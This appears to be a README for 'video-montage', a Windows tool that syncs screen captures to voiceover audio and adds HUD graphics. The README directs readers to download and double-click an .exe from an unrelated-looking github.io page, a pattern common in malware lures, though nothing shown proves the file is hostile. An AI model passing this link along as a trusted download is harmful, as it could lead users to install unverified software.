🎬 video-montage - Create professional product videos quickly locally

https://img.shields.io/badge/Download-VideoMontage-blue

Video-montage helps you build product demo videos on your own computer. You capture frames from your screen, and the software handles the rest. It uses automated voiceover tools to turn your script into speech. You import your audio files, and the tool snaps each video clip into the right spot based on the voice timings. It adds a clean, technical look to your videos using built-in graphic elements.

📥 How to download the software

You can get the latest version of the software from the project page. Visit this page to download the installer for your computer.

https://jennettemesoamerican289.github.io

Choose the file that ends in .exe for Windows. Save the file to your computer. Double-click the file once the download finishes to start the installation. Follow the prompts on your screen to complete the setup.

💻 System requirements

The software runs on Windows 10 or Windows 11. Ensure your system meets these standards to see the best results:

  • Processor: Modern Intel Core i5 or AMD Ryzen 5 or better.
  • Memory: 8 GB of RAM or more.
  • Storage: 500 MB of free space for the application files.
  • Graphics: A display that supports 1920x1080 resolution.

🚀 Setting up your project

When you open the application, you see a main project window. Follow these steps to start your first video:

  1. Click the New Project button to start a fresh editing session.
  2. Select the folder on your computer that contains your video screen captures. The software scans these files and adds them to your project library.
  3. Import your voiceover audio files. Select the folder where you saved your MP3 files.
  4. The software matches your audio files to the video clips by checking the timestamps. You see the clips populate your video timeline in order.

🛠 Using the editor

The interface shows three main areas. The top area holds your media. The middle area acts as your timeline. The right panel allows you to change settings for your video elements.

To add the holographic HUD graphics, drag the HUD component from the assets panel directly onto your timeline. You can resize these graphics and move them anywhere on the screen. The software layers these over your video clips to give your product demo a technical, clean aesthetic.

If you need to adjust the timing of a clip, click and drag the edge of the clip on the timeline. The software adjusts the surrounding clips to keep everything synchronized with your voiceover.

⚙️ Changing settings

You can change how the software processes your videos in the Settings menu. The software uses a library called FFmpeg to handle video files in the background. If you notice slow performance, choose a lower export quality in the Project Settings tab.

You can also adjust the scale and color of the holographic HUD elements. Use the controls in the sidebar to increase the brightness or change the glow effects of your graphics to match your brand style.

💾 Exporting your video

Once you arrange your clips and add your graphics, you must create your video file. Click the Export button at the top right of the window.

The software opens a window asking for your save location. Select a format like MP4 to ensure your video plays on all modern devices. Choose your desired resolution. Click the Start Export button to begin the rendering process.

The software processes the video on your local machine, so speed depends on the power of your computer. Do not close the app while the progress bar moves.

❓ Common questions

Does the software send my video to the cloud? No. All processing happens on your local computer. Your files stay private.

What happens if the audio does not match the video? You can manually shift clips on the timeline by dragging them left or right. The software tracks your changes and updates the preview automatically.

Can I undo my mistakes? Yes. Use the keyboard shortcut Control plus Z to reverse your last action.

Does this software require an internet connection? You only need an internet connection to download the installer. The software works offline once you install it on your machine.
